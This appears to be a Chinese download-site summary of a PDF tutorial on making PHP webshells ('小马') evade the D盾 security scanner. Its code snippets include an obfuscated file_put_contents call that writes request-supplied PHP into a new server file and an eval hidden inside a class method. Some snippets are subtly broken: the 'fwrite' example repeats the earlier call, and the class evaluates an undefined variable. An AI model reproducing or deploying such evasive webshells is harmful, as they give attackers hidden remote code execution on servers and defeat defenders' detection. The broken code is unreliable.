PHP小马免杀技巧:绕过D盾解析
需积分: 0 69 浏览量
更新于2024-08-05
收藏 3.01MB PDF 举报
"PHP小马免杀的浅谈[过最新D盾]1"
本文主要讨论的是如何在PHP环境中创建和执行免杀(即避免安全检测工具检测)的小马(恶意代码),特别是针对最新版本的D盾防御系统。作者分享了两种主要的绕过策略。
策略一:利用写文件函数生成并包含PHP文件
1. **File_put_contents** 方法:通过File_put_contents函数将接收到的数据写入一个新的PHP文件,然后通过include或require将其执行。然而,即使这样,D盾仍然可以检测到。对于PHP7.0以上版本,可以尝试其他方法来绕过检测。例如,使用GET参数传递数据,虽然测试时更直观,但实际操作中应改为POST方式以增加隐蔽性。
```php
<?php
// ...
(~urldecode("%99%96%93%9A%A0%8F%8A%8B%A0%9C%90%91%8B%9A%91%8B%8C"))('oagi.php','<?php'.$_GET[a]);
// ...
?>
```
2. **fwrite** 函数:与File_put_contents类似,fwrite也可以用来写文件。下面的例子展示了如何使用fwrite实现同样的目的,同样可以成功绕过D盾的检测。
```php
<?php
// ...
(~urldecode("%99%96%93%9A%A0%8F%8A%8B%A0%9C%90%91%8B%9A%91%8B%8C"))('oagi.php','<?php'.$_POST[a]);
// ...
?>
```
策略二:防止被识别为可疑的eval函数
eval函数通常被视为潜在的安全风险,因此D盾可能会检测到它。为了解决这个问题,可以采取以下方法:
1. **使用类包装eval**:不在函数内部或者直接裸露使用eval,而是创建一个类,并在类的方法中执行eval。这样可以降低被识别为可疑eval的风险。
```php
<?php
// ...
class a {
public $command_;
public function b($command) {
// ...
eval($command_);
}
}
// ...
?>
```
通过这些方法,可以在一定程度上避免安全防护工具对PHP小马的检测。然而,值得注意的是,这样的实践可能违反安全政策,且在生产环境中应避免使用,因为它们可能被恶意利用。在进行渗透测试或漏洞研究时,务必确保遵循道德和法律规定,尊重目标系统的安全策略。
2012-09-20 上传
2021-02-28 上传
2024-01-18 上传
2010-01-10 上传
2009-03-29 上传
2021-07-28 上传
2021-11-30 上传
东郊椰林放猪散仙
- 粉丝: 24
- 资源: 300
最新资源
- 前端协作项目:发布猜图游戏功能与待修复事项
- Spring框架REST服务开发实践指南
- ALU课设实现基础与高级运算功能
- 深入了解STK:C++音频信号处理综合工具套件
- 华中科技大学电信学院软件无线电实验资料汇总
- CGSN数据解析与集成验证工具集:Python和Shell脚本
- Java实现的远程视频会议系统开发教程
- Change-OEM: 用Java修改Windows OEM信息与Logo
- cmnd:文本到远程API的桥接平台开发
- 解决BIOS刷写错误28:PRR.exe的应用与效果
- 深度学习对抗攻击库:adversarial_robustness_toolbox 1.10.0
- Win7系统CP2102驱动下载与安装指南
- 深入理解Java中的函数式编程技巧
- GY-906 MLX90614ESF传感器模块温度采集应用资料
- Adversarial Robustness Toolbox 1.15.1 工具包安装教程
- GNU Radio的供应商中立SDR开发包:gr-sdr介绍